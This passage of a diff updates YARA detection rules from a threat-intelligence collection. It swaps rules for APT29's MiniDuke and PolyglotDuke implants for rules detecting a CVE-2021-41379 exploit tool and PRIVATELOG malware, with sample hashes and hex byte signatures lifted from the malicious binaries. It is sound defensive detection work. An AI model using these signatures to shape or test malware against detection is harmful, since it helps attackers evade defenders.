3d 6a ff 6a 00 50 8d 4d a4 e8 d5 39 fb ff c6 45 fc 3c 83 bd cc f8 ff ff 10 72 0e ff b5 b8 f8 ff ff e8 d2 c5 1f 00 83 c4 04 c7 85 cc f8 ff ff 0f 00 00 00 c7 85 c8 f8 ff ff 00 00 00 00 c6 85 b8 f8 ff ff 00 c6 45 fc 3b 83 bd 88 f7 ff ff 10 72 0e ff b5 74 f7 ff ff e8 9c c5 1f 00 83 c4 04 c7 85 88 f7 ff ff 0f 00 00 00 c7 85 84 f7 ff ff 00 00 00 00 c6 85 74 f7 ff ff 00 c6 45 fc 3a 83 bd b0 f8 ff ff 10 72 0e ff b5 9c f8 ff ff e8 66 c5 1f 00 83 c4 04 c7 85 b0 f8 ff ff 0f 00 00 00 c7 85 ac f8 ff ff 00 00 00 00 c6 85 9c f8 ff ff 00 c6 45 fc 39 83 bd 18 f7 ff ff 10 72 0e ff b5 04 f7 ff ff e8 30 c5 1f 00 83 c4 04 c7 85 18 f7 ff ff 0f 00 00 00 c7 85 14 f7 ff ff 00 00 00 00 c6 85 04 f7 ff ff 00 c6 45 fc 38 83 bd 94 f8 ff ff 10 72 0e ff b5 80 f8 ff ff e8 fa c4 1f 00 83 c4 04 c7 85 94 f8 ff ff 0f 00 00 00 c7 85 90 f8 ff ff 00 00 00 00 c6 85 80 f8 ff ff 00 c6 45 fc 37 83 bd 30 f8 ff ff 10 72 0e ff b5 1c f8 ff ff e8 c4 c4 1f 00 83 c4 04 c7 85 30 f8 ff ff 0f 00 00 00 c7 85 2c f8 ff ff 00 00 00 00 c6 85 1c f8 ff ff 00 c6 45 fc 36 83 bd 98 fa ff ff 10 72 0e ff b5 84 fa ff ff e8 8e c4 1f 00 83 c4 04 c7 85 98 fa ff ff 0f 00 00 00 c7 85 94 fa ff ff 00 00 00 00 c6 85 84 fa ff ff 00 c6 45 fc 35 83 bd 80 fa ff ff 10 72 0e ff b5 6c fa ff ff e8 58 c4 1f 00 83 c4 04 c7 85 80 fa ff ff 0f 00 00 00 c7 85 7c fa ff ff 00 00 00 00 c6 85 6c fa ff ff 00 c6 45 fc 27 83 bd 50 fa ff ff 10 72 0e ff b5 3c fa ff ff e8 22 c4 1f 00 83 c4 04 c7 85 50 fa ff ff 0f 00 00 00 c7 85 4c fa ff ff 00 00 00 00 c6 85 3c fa ff ff 00 53 19 d3 bb 18 4a 91 1c 21 c3 bb 82 54 5d 2c bb b0 08 2a 58 90 5b 51 21 e9 b9 b9 6e b4 14 31 f1 01 c1 01 f9 19 e1 21 d9 09 f9 90 59 56 be cd 3a 33 5a be 85 1b aa 6f be 1e 6c 78 2d 19 d6 21 e6 90 5e 53 31 f3 bb 8c 21 88 0d 31 db 31 eb 19 d3 19 f3 31 f3 01 f3 90 5b 80 7e 40 00 0f 85 03 06 00 00 66 c7 85 60 fe ff ff 0d 0a c7 85 48 fe ff ff 0d 0a 2d 2d c7 85 d8 fc ff ff 43 6f 6e 74 c7 85 dc fc ff ff 65 6e 74 2d c7 85 e0 fc ff ff 44 69 73 70 c7 85 e4 fc ff ff 6f 73 69 74 c7 85 e8 fc ff ff 69 6f 6e 3a c7 85 ec fc ff ff 20 66 6f 72 c7 85 f0 fc ff ff 6d 2d 64 61 c7 85 f4 fc ff ff 74 61 3b 20 c7 85 f8 fc ff ff 6e 61 6d 65 c7 85 fc fc ff ff 3d 22 63 73 c7 85 00 fd ff ff 72 66 5f 74 c7 85 04 fd ff ff 6f 6b 65 6e c7 85 08 fd ff ff 22 0d 0a 0d c6 85 0c fd ff ff 0a 8d 8d 60 fe ff ff 8d 85 62 fe ff ff 51 50 51 8d 8d 00 f9 ff ff e8 b7 30 fb ff 8b d8 c6 45 fc 3e 8d 8d 48 fe ff ff 8d 85 4c fe ff ff 51 50 51 8d 8d 30 f9 ff ff e8 97 30 }
-		$op1 = { 37 25 38 3d 38 43 38 5e 38 6c 38 77 38 }
-		$op2 = { 3f 25 3f 36 3f 66 3f 74 3f }
-		$op3 = { 68 66 43 78 28 6a 25 }
-		$op4 = { 61 46 25 7c 5f 56 21 }
+		$s1 = { 50 6a 01 50 68 03 00 08 00 68 [3] 00 ff 15 [3] 00 8b f0 83 fe ff 0f 84 [2] 00 00 6a 00 56 ff 15 88 [2] 00 8d 85 ?? fb ff ff c7 85 ?? fb ff ff 00 00 00 00 50 56 ff 15 [3] 00 8b 3d [3] 00 56 ff d7 ff 15 [3] 00 50 6a 00 68 00 10 10 00 ff 15 [3] 00 8b f0 c7 85 ?? fb ff ff 00 00 00 00 8d 85 ?? fb ff ff 50 68 ff 01 0f 00 56 ff 15 [3] 00 56 ff d7 8d 85 ?? fb ff ff c7 85 ?? fb ff ff 00 00 00 00 50 6a 01 6a 02 6a 00 68 ff 01 0f 00 ff b5 ?? fb ff ff ff 15 [3] 00 ff b5 ?? fb ff ff ff d7 6a 04 8d 85 ?? fb ff ff 50 6a 0c ff b5 ?? fb ff ff ff 15 08 [2] 00 6a 44 8d 85 78 fb ff ff 0f 57 c0 6a 00 50 0f 11 85 bc fb ff ff e8 [2] 00 00 83 c4 0c c7 85 78 fb ff ff 44 00 00 00 b8 05 00 00 00 c7 85 80 fb ff ff [3] 00 66 89 85 a8 fb ff ff 8d 85 e8 fd ff ff 68 04 01 00 00 50 68 [3] 00 ff 15 [3] 00 8d 85 bc fb ff ff 50 8d 85 78 fb ff ff 50 6a 00 6a 00 6a 10 6a 00 6a 00 6a 00 6a 00 8d 85 e8 fd ff ff 50 ff b5 ?? fb ff ff ff 15 [3] 00 ff b5 ?? fb ff ff ff d7 ff b5 bc fb ff ff ff d7 ff b5 c0 fb ff ff ff d7 }
+		$s2 = { 6a 00 68 80 00 00 04 6a 04 6a 00 6a 01 68 00 00 01 80 8d 85 e8 fd ff ff 50 ff 15 [3] 00 8b 35 [3] 00 a3 [3] 00 8d 85 d8 fb ff ff 50 6a 00 6a 00 68 [2] 40 00 6a 00 6a 00 c7 85 d8 fb ff ff 00 00 00 00 ff d6 8b f8 8b 85 dc fb ff ff 68 [3] 00 05 0c 02 00 00 68 04 01 00 00 50 }
+		$s3 = { 55 8b ec 81 ec 04 08 00 00 a1 04 [2] 00 33 c5 89 45 fc 0f 10 05 [3] 00 ?? 8b ?? 08 8d 85 2c f8 ff ff [0-1] 0f 11 85 fc f7 ff ff [1-5] 0f 10 05 [3] 00 [3-8] 0f 11 85 0c f8 ff ff [0-1] 0f 10 05 }
+		$s4 = { 50 ff ?? 68 04 01 00 00 8d 85 e0 fb ff ff 50 6a 00 ff 15 [3] 00 50 ff 15 [3] 00 6a 00 e8 [2] ff ff 50 8d 85 e0 fb ff ff 50 ff 15 84 [2] 00 6a 00 ff 15 [3] 00 8d 85 ?? fb ff ff 50 68 [3] 00 6a 04 6a 00 68 [3] 00 ff 15 [3] 00 ff 15 [3] 00 8b 35 [3] 00 8b 3d [3] 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 350KB and 2 of ( $seq* ) and 3 of ( $op* )
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT29_Miniduke_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_3 : CVE_2021_41379 FILE
 {
 	meta:
-		description = "Detect MiniDuke implant used by APT29 group"
+		description = "Detect exploit tool using CVE-2021-41379 (variant 3)"
 		author = "Arkbird_SOLG"
-		id = "2faefc2f-afe3-51df-b530-50d3b3775071"
-		date = "2021-03-08"
-		modified = "2021-03-10"
+		id = "c82578d6-63ca-50f6-b105-321791ec8808"
+		date = "2021-11-26"
+		modified = "2021-11-29"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_MiniDuke_Mar_2021_1.yar#L1-L20"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_3.yara#L1-L27"
 		license_url = "N/A"
-		logic_hash = "2fcbe37f9ee26a246bfc397cc907bb570a01d0f5b8e323a81aae0f6426b60435"
-		score = 50
+		logic_hash = "559c4ca0e9ac60e3dd7d5b9a8eb22d887b0b436d4e1fc528e05e7a33ecce0aa6"
+		score = 75
 		quality = 75
-		tags = "FILE"
-		hash1 = "6057b19975818ff4487ee62d5341834c53ab80a507949a52422ab37c7c46b7a1"
-		level = "Experimental"
+		tags = "CVE-2021-41379, FILE"
+		hash1 = "0dcda614c0128813bf74802f0e98ffd5ec32a40f35ed42778a5ec5984b5adf47"
+		hash2 = "3c78e07924e1503be1f8785c23d0dd813f04211992cbd6a4955cd0e25c745735"
+		hash3 = "57ec6e15bcc9c79c118f97103815bd74226d4baae334142890a52fbbc5006f1b"
+		hash4 = "9d24383e50e61257c565e47ec073cbb2cd751b6f650f0d542b0643dbe6691b3c"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$s1 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75 6e 64 61 72 79 3d 00 00 00 00 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 25 73 }
-		$s2 = { 70 72 6f 63 3a 20 20 25 64 20 25 73 0a 6c 6f 67 69 6e 3a 20 25 73 5c 25 73 0a 49 44 3a 20 20 20 20 30 78 25 30 38 58 0a 68 6f 73 74 3a 20 20 25 73 3a 25 64 0a 6d 65 74 68 3a 20 20 25 73 20 25 64 0a 70 69 70 65 3a 20 5c 5c 25 73 5c 70 69 70 65 5c 25 73 0a 6c 61 6e 67 3a 20 20 25 73 0a 64 65 6c 61 79 3a 20 25 64 }
-		$s3 = { 75 70 74 69 6d 65 20 25 35 64 2e 25 30 32 64 68 0a 00 25 73 3a 25 64 00 25 73 5c 25 73 00 3f 00 25 64 20 25 73 0a 25 73 20 25 73 20 25 73 }
-		$s4 = { 55 89 e5 83 ec 14 6a 02 ff 15 b8 53 44 00 e8 fd fe ff ff 8d b6 00 00 00 00 8d bc 27 00 00 00 00 55 89 e5 83 ec 14 6a 01 ff 15 }
-		$s5 = { 8b 85 54 64 ff ff 8b 95 44 64 ff ff 83 c2 44 89 44 24 04 89 14 24 e8 a4 e5 fc ff 83 ec 08 8b 85 44 64 ff ff 83 c0 38 c7 44 24 08 0c 00 00 00 c7 44 24 04 00 00 00 00 89 04 24 e8 8c e8 fd ff 8b 85 44 64 ff ff c7 40 38 0c 00 00 00 8b 85 44 64 ff ff c7 40 40 01 00 00 00 8b 85 44 64 ff ff c7 40 3c 00 00 00 00 8b 85 44 64 ff ff 8d 58 38 8b 85 44 64 ff ff 8d 50 1c 8b 85 44 64 ff ff 83 c0 18 c7 44 24 0c 00 40 00 00 89 5c 24 08 89 54 24 04 89 04 24 e8 2e e5 fc ff 83 ec 10 85 c0 0f 95 c0 84 c0 0f 84 09 05 00 00 8b 85 44 64 ff ff 8d 58 38 8b 85 44 64 ff ff 8d 50 24 8b 85 44 64 ff ff 83 c0 20 c7 44 24 0c 00 40 00 00 89 5c 24 08 89 54 24 04 89 04 24 e8 eb e4 fc ff 83 ec 10 85 c0 0f 95 c0 84 c0 }
+		$s1 = { 8d 0d [2] 03 00 e8 [2] ff ff 41 b8 00 00 00 80 33 d2 33 c9 ff 15 [2] 03 00 48 89 45 08 41 b8 01 00 00 00 48 8d 15 [3] 00 48 8b 4d 08 ff 15 [2] 03 00 48 89 45 28 ff 15 [2] 03 00 3d 24 }
+		$s2 = { 33 d2 48 8b 4d 08 ff 15 [2] 03 00 c7 45 24 00 00 00 00 48 8d 55 24 48 8b 4d 08 ff 15 [2] 03 00 48 8b 4d 08 ff 15 [2] 03 00 ff 15 [2] 03 00 44 8b c0 33 d2 b9 00 10 10 00 ff 15 [2] 03 00 48 89 45 48 48 c7 45 68 00 00 00 00 4c 8d 45 68 ba ff 01 0f 00 48 8b 4d 48 ff 15 [2] 03 00 48 8b 4d 48 ff 15 [2] 03 00 48 c7 85 88 00 00 00 00 00 00 00 48 8d 85 88 00 00 00 48 89 44 24 28 c7 44 24 20 01 00 00 00 41 b9 02 00 00 00 45 33 c0 ba ff 01 0f 00 48 8b 4d 68 ff 15 [2] 03 00 48 8b 4d 68 ff 15 [2] 03 00 41 b9 04 00 00 00 4c 8d 45 24 ba 0c 00 00 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8d 85 a8 00 00 00 48 8b f8 33 c0 b9 18 00 00 00 f3 aa 48 8d 85 e0 00 00 00 48 8b f8 33 c0 b9 68 00 00 00 f3 aa c7 85 e0 00 00 00 68 00 00 00 b8 05 00 00 00 66 89 85 20 01 00 00 48 8d 05 [2] 02 00 48 89 85 f0 00 00 00 41 b8 04 01 00 00 48 8d 95 70 01 00 00 48 8d 0d [2] 02 00 ff 15 [2] 03 00 48 8d 85 a8 00 00 00 48 89 44 24 50 48 8d 85 e0 00 00 00 48 89 44 24 48 48 c7 44 24 40 00 00 00 00 48 c7 44 24 38 00 00 00 00 c7 44 24 30 10 00 00 00 c7 44 24 28 00 00 00 00 48 c7 44 24 20 00 00 00 00 45 33 c9 45 33 c0 48 8d 95 70 01 00 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8b 8d a8 00 00 00 ff 15 [2] 03 00 48 8b 8d b0 00 00 00 ff 15 [2] 03 00 }
+		$s3 = { 41 b8 00 00 00 80 33 d2 33 c9 ff 15 [2] 03 00 48 89 45 08 41 b8 01 00 00 00 48 8d 15 [3] 00 48 8b 4d 08 ff 15 [2] 03 00 48 89 45 28 48 8b 4d 08 ff 15 [2] 03 00 48 c7 45 48 00 00 00 00 c7 45 64 00 00 00 00 4c 8d 4d 64 45 33 c0 48 8b 55 48 48 8b 4d 28 ff 15 [2] 03 00 8b 45 64 48 89 85 88 04 00 00 ff 15 [2] 03 00 48 8b 8d 88 04 00 00 4c 8b c1 ba 0c 00 00 00 48 8b c8 ff 15 [2] 03 00 48 89 45 48 4c 8d 4d 64 44 8b 45 64 48 8b 55 48 48 8b 4d 28 ff 15 [2] 03 00 48 8b 45 48 4c 8b 40 10 ba 04 01 00 00 48 8d 8d 90 00 00 00 ff 15 [2] 03 00 ff 15 [2] 03 00 4c 8b 45 48 33 d2 48 8b c8 ff 15 [2] 03 00 48 8b 4d 28 ff 15 [2] 03 00 c7 85 b4 02 00 00 01 00 00 00 c7 85 d4 02 00 00 00 00 00 }
+		$s4 = { 68 00 00 00 80 6a 00 6a 00 ff 15 24 f0 43 00 3b f4 e8 bf 5b ff ff 89 45 f8 8b f4 6a 01 68 34 84 43 00 8b 45 f8 50 ff 15 20 f0 43 00 3b f4 e8 a2 5b ff ff 89 45 ec 8b f4 ff 15 2c f1 43 00 3b f4 e8 90 5b ff ff 3d 24 }
+		$s5 = { f3 ab a1 0c d0 43 00 33 c5 89 45 fc b9 d9 10 44 00 e8 55 9c ff ff 8b 45 08 89 45 f4 b9 0c 00 00 00 be a4 7e 43 00 8d bd ec f7 ff ff f3 a5 68 d0 07 00 00 6a 00 8d 85 1c f8 ff ff 50 e8 bd 95 ff }
+		$s6 = { 8b f4 6a 00 8b 45 f4 50 ff 15 88 f0 43 00 3b f4 e8 8d 67 ff ff c7 45 e8 00 00 00 00 8b f4 8d 45 e8 50 8b 4d f4 51 ff 15 c8 f0 43 00 3b f4 e8 6f 67 ff ff 8b f4 8b 45 f4 50 ff 15 30 f1 43 00 3b f4 e8 5c 67 ff ff 8b f4 ff 15 a4 f0 43 00 3b f4 e8 4d 67 ff ff 8b f4 50 6a 00 68 00 10 10 00 ff 15 b8 f0 43 00 3b f4 e8 36 67 ff ff 89 45 dc c7 45 d0 00 00 00 00 8b f4 8d 45 d0 50 68 ff 01 0f 00 8b 4d dc 51 ff 15 3c f0 43 00 3b f4 e8 10 67 ff ff 8b f4 8b 45 dc 50 ff 15 30 f1 43 00 3b f4 e8 fd 66 ff ff c7 45 c4 00 00 00 00 8b f4 8d 45 c4 50 6a 01 6a 02 6a 00 68 ff 01 0f 00 8b 4d d0 51 ff 15 38 f0 43 00 3b f4 e8 d4 66 ff ff 8b f4 8b 45 d0 50 ff 15 30 f1 43 00 3b f4 e8 c1 66 ff ff 8b f4 6a 04 8d 45 e8 50 6a 0c 8b 4d c4 51 ff 15 2c f0 43 00 3b f4 e8 a6 66 ff ff 33 c0 89 45 ac 89 45 b0 89 45 b4 89 45 b8 6a 44 6a 00 8d 85 60 ff ff ff 50 e8 36 63 ff ff 83 c4 0c c7 85 60 ff ff ff 44 00 00 00 b8 05 00 00 00 66 89 45 90 c7 85 68 ff ff ff a0 86 43 00 8b f4 68 04 01 00 00 8d 85 50 fd ff ff 50 68 c8 86 43 00 ff 15 58 f1 43 00 3b f4 e8 48 66 ff ff 8b f4 8d 45 ac 50 8d 8d }
+		$s7 = { 40 53 48 81 ec 30 08 00 00 48 8b 05 b8 78 00 00 48 33 c4 48 89 84 24 20 08 00 00 0f 10 05 7e 4e 00 00 48 8b d9 33 d2 0f 10 0d 82 4e 00 00 48 8d 4c 24 50 41 b8 d0 07 00 00 0f 29 44 24 20 0f 10 05 7b 4e 00 00 0f 29 4c 24 30 0f 29 44 24 40 e8 da 42 00 00 4c 8b 03 48 8d 4c 24 20 ba 00 04 00 00 e8 6a f8 ff ff 33 d2 8d 4a 02 ff 15 77 4c 00 00 48 8b 4b 08 48 8d 54 24 20 ff 15 70 4c 00 00 33 c0 48 8b 8c 24 20 08 00 00 48 33 cc e8 de 34 00 00 48 81 c4 30 08 00 00 }
+		$s8 = { 33 d2 48 8b cb ff 15 c6 2c 00 00 83 65 00 00 48 8d 55 00 48 8b cb ff 15 85 2c 00 00 48 8b cb ff 15 1c 2d 00 00 ff 15 86 2c 00 00 33 d2 b9 00 10 10 00 44 8b c0 ff 15 46 2c 00 00 48 83 64 24 68 00 4c 8d 44 24 68 48 8b c8 ba ff 01 0f 00 48 8b d8 ff 15 82 2b 00 00 48 8b cb ff 15 e1 2c 00 00 48 8b 4c 24 68 48 8d 44 24 60 48 83 64 24 60 00 41 b9 02 00 00 00 48 89 44 24 28 45 33 c0 ba ff 01 0f 00 c7 44 24 20 01 00 00 00 ff 15 80 2b 00 00 48 8b 4c 24 68 ff 15 a5 2c 00 00 48 8b 4c 24 60 4c 8d 45 00 41 b9 04 00 00 00 41 8d 51 08 ff 15 1c 2b 00 00 33 c0 48 8d 4d 90 0f 57 c0 48 89 45 80 33 d2 0f 11 44 24 70 8d 58 68 44 8b c3 e8 5b 25 00 00 8d 43 9d 89 5d 90 66 89 45 d0 48 8d 55 10 48 8d 05 e0 33 00 00 41 b8 04 01 00 00 48 8d 0d f3 33 00 00 48 89 45 a0 ff 15 91 2c 00 00 48 8b 4c 24 60 48 8d 44 24 70 48 89 44 24 50 48 8d 55 10 48 8d 45 90 45 33 c9 48 89 44 24 48 45 33 c0 48 83 64 24 40 00 48 83 64 24 38 00 c7 44 24 30 10 00 00 00 83 64 24 28 00 48 83 64 24 20 00 ff 15 9a 2a 00 00 48 8b 4c 24 60 ff 15 ef 2b 00 00 48 8b 4c 24 70 ff 15 e4 2b 00 00 48 8b 4c 24 78 ff 15 d9 }
+		$s9 = { 33 d2 33 c9 41 b8 00 00 00 80 ff 15 ba 33 00 00 41 b8 01 00 00 00 48 8d 15 7d 3b 00 00 48 8b c8 48 8b d8 ff 15 d9 33 00 00 48 8b cb 48 8b f8 ff 15 8d 33 00 00 4c 8d 4c 24 20 89 74 24 20 45 33 c0 33 d2 48 8b cf ff 15 ae 33 00 00 8b 5c 24 20 ff 15 64 34 00 00 44 8b c3 ba 0c 00 00 00 48 8b c8 ff 15 33 34 00 00 44 8b 44 24 20 4c 8d 4c 24 20 48 8b d0 48 8b cf 48 8b d8 ff 15 7a 33 00 00 4c 8b 43 10 48 8d 4c 24 30 ba 04 01 00 00 ff 15 46 37 00 00 ff 15 20 34 00 00 4c 8b c3 33 d2 48 8b c8 ff 15 9a 33 00 00 48 8b cf ff 15 11 33 00 00 48 8d 4c 24 30 8b fe ff 15 a4 33 00 00 83 e8 02 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 150KB and 3 of them
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT29_Polyglotduke_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_PRIVATELOG_Sep_2021_1 : FILE
 {
 	meta:
-		description = "Detect PolyglotDuke implant used by APT29 group"
+		description = "Detect PRIVATELOG malware"
 		author = "Arkbird_SOLG"
-		id = "751e4f57-2c31-5cad-a794-e124b40c537b"
-		date = "2021-03-08"
-		modified = "2021-03-10"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_PolyglotDuke_Mar_2021_1.yar#L1-L19"
+		id = "fa122d77-0bac-5836-85fd-b096660f7412"
+		date = "2021-09-01"
+		modified = "2021-09-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-05/MAL_PRIVATELOG_Sep_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "3a6d54fb266fe054886569c200f122b1e4459e0d561fe5246b623a19ec526224"
-		score = 75
-		quality = 75
+		logic_hash = "4df78bc3005c67d467a0999751bf4fb42ff9075f1601d51ab3b2b88e5dc38f6e"
+		score = 50
+		quality = 50
 		tags = "FILE"
-		hash1 = "9b33ec7f5e615a6556f147b611425d3ca4a8879ce746d4a8cb62adf4c7f76029"
-		hash2 = "0c39fce5bd32b4f91a1df4f6321c2f01c017195659c7e95a235ef71ca2865aa9"
+		hash1 = "1e53559e6be1f941df1a1508bba5bb9763aedba23f946294ce5d92646877b40c"
+		hash2 = "b9d4ec771a79f53a330b29ed17f719dac81a4bfe11caf0eac0efacd19d14d090"
+		level = "experimental"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$seq1 = { 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 02 ff d0 48 83 c4 28 c3 cc 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 02 ff d0 48 83 c4 28 c3 cc 4c 8b 15 [2] 02 00 41 8b c0 4c 33 15 [2] 02 00 74 03 49 ff e2 83 e0 01 4c 8b ca 41 83 e0 02 8b d0 48 ff 25 [2] 01 00 cc cc cc 4c 8b 15 [2] 02 00 4c 33 15 [2] 02 00 74 03 49 ff e2 48 ff 25 [2] 01 00 cc cc 48 83 ec 28 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 07 48 83 c4 28 48 ff e0 b9 78 00 00 00 ff 15 [2] 01 00 32 c0 48 83 c4 28 c3 cc cc cc 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 03 48 ff e0 33 c0 c3 cc cc 48 8b 05 [2] 02 00 48 33 05 [2] 02 00 74 03 48 ff e0 }
-		$seq2 = { 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 57 48 83 ec 30 33 ff 48 8b da 48 8b f1 48 85 c9 75 18 e8 69 0c 00 00 bb 16 00 00 00 89 18 e8 b1 38 00 00 8b c3 e9 a7 00 00 00 48 85 d2 74 e3 e8 a8 3f 00 00 41 bf 01 00 00 00 85 c0 75 0c ff 15 [2] 01 00 85 c0 41 0f 44 ff 83 64 24 28 00 48 83 23 00 48 83 64 24 20 00 41 83 c9 ff 4c 8b c6 33 d2 8b cf ff 15 [2] 01 00 48 63 e8 85 c0 75 11 ff 15 [2] 01 00 8b c8 e8 b2 0b 00 00 33 c0 eb 4f 48 8b cd 48 03 c9 e8 e3 07 00 00 48 89 03 48 85 c0 74 e9 41 83 c9 ff 4c 8b c6 33 d2 8b cf 89 6c 24 28 48 89 44 24 20 ff 15 [2] 01 00 85 c0 75 1b ff 15 [2] 01 00 8b c8 e8 70 0b 00 00 48 8b 0b e8 ?? f3 ff ff 48 83 23 00 eb b0 41 8b c7 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 8b 7c 24 58 48 83 c4 30 41 5f c3 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 57 48 83 ec 40 33 ff 48 8b da 48 8b f1 }
-		$seq3 = { ff 25 00 00 00 00 00 00 00 00 00 00 00 00 cc }
-		$seq4 = "InitSvc" fullword ascii
+		$s1 = { 41 89 d0 48 83 ec 20 4c 89 f1 31 d2 e8 cb 8c 00 00 48 83 ec 10 48 89 5c 24 20 48 8d 15 4b 03 02 00 48 c7 c1 02 00 00 80 45 31 c0 41 b9 19 01 02 00 ff 15 55 52 01 00 48 83 c4 30 89 c7 85 c0 75 5a 49 8d 46 02 48 8b 0b 48 83 ec 30 48 89 74 24 28 48 89 44 24 20 48 8d 15 4f 03 02 00 45 31 c0 45 31 c9 ff 15 1b 52 01 00 48 83 c4 30 89 c7 85 c0 75 28 66 41 c7 06 7b 00 48 83 ec 20 48 8d 15 c0 02 02 00 4c 89 f1 ff 15 17 52 01 00 4c 89 f1 e8 67 c9 00 00 48 83 c4 20 31 ff 48 8b 0b 48 83 ec 20 ff 15 d4 51 01 00 48 83 c4 20 48 8b 4d f8 48 31 e9 48 83 ec 20 e8 f0 79 00 00 48 83 c4 20 89 f8 48 89 ec }
+		$s2 = { 48 8d 0d 87 c9 01 00 48 8d 15 47 01 00 00 ff 15 1a 14 01 00 48 89 05 e3 d8 01 00 48 85 c0 0f 84 d0 00 00 00 c7 05 e8 d8 01 00 00 00 00 00 48 8d 15 d1 d8 01 00 c7 05 df d8 01 00 b8 0b 00 00 0f 28 05 80 1c 01 00 0f 29 05 b9 d8 01 00 44 8b 05 e2 c8 01 00 41 8d 48 01 89 0d d8 c8 01 00 44 89 05 b5 d8 01 00 48 89 c1 ff 15 b8 13 01 00 31 c9 ba 01 00 00 00 45 31 c0 45 31 c9 ff 15 b5 14 01 00 48 89 05 9e d8 01 00 48 85 c0 0f 84 85 00 00 00 48 b8 04 00 00 00 01 00 00 00 48 89 05 68 d8 01 00 48 8d 15 5d d8 01 00 c7 05 5f d8 01 00 00 00 00 00 48 c7 05 5c d8 01 00 00 00 00 00 48 8b 0d 39 d8 01 00 ff 15 5b 13 01 00 e8 61 01 00 00 85 c0 74 2b 48 b9 01 00 00 00 01 00 00 00 48 89 0d 25 d8 01 00 48 8d 15 1a d8 01 00 89 05 20 d8 01 00 eb 44 48 83 c4 28 48 ff 25 57 14 01 00 48 8b 0d 20 d8 01 00 ba ff ff ff ff ff 15 9d 13 01 00 e8 eb c5 ff ff 48 b8 01 00 00 00 01 00 00 00 48 89 05 e3 d7 01 00 48 8d 15 d8 d7 01 00 c7 05 da d7 01 00 00 00 00 00 48 c7 05 d7 d7 01 00 00 00 00 00 48 8b 0d b4 d7 01 00 48 83 c4 28 48 ff 25 d1 12 01 00 48 83 ec 28 83 f9 01 75 69 48 b8 03 00 00 00 01 00 00 00 48 89 05 9b d7 01 00 48 8d 15 90 d7 01 00 31 c0 89 05 94 d7 01 00 89 05 9a d7 01 00 8b 05 ac c7 01 00 8d 48 01 89 0d a3 c7 01 00 89 05 81 d7 01 00 48 8b 0d 5e d7 01 00 ff 15 80 12 01 }
+		$s3 = { 48 89 01 c7 44 24 28 00 00 00 00 c7 44 24 20 03 00 00 00 ba 00 00 00 80 41 b8 01 00 00 00 45 31 c9 ff 15 f7 59 01 00 48 83 f8 ff 0f 84 e0 01 00 00 48 89 c6 0f 57 c0 48 8d 94 24 a0 00 00 00 0f 29 42 60 0f 29 42 50 0f 29 42 40 0f 29 42 30 0f 29 42 20 0f 29 42 10 0f 29 02 48 c7 42 70 00 00 00 00 4c 8d 44 24 7c 41 c7 00 78 00 00 00 48 89 c1 ff 15 9f 59 01 00 85 c0 0f 84 d0 01 00 00 8b 84 24 dc 00 00 00 c1 e0 0d 48 8d 8c 24 98 00 00 00 48 89 4c 24 38 89 44 24 20 c7 44 24 30 01 00 00 00 c7 44 24 28 02 00 00 00 48 89 f1 31 d2 45 31 c0 45 31 c9 ff 15 53 59 01 00 85 }
+		$s4 = { c6 00 00 48 ff c0 48 83 ec 20 48 89 f9 48 89 c2 ff 15 8e 19 01 00 48 8d 15 a9 cd 01 00 48 89 d9 ff 15 86 19 01 00 48 89 d9 ff 15 55 19 01 00 48 }
+		$s5 = "Global\\APCI#" fullword wide
+		$s6 = "uGlobal\\HVID_" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 3 of them
+		uint16( 0 ) == 0x5A4D and filesize > 20KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_SP_Vault7_SIG_F_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Stashlog_Sep_2021_1 : FILE
 {
 	meta:
-		description = "Detect open-source PasswordReminder recovery tools used by Chinese APT in the Past"
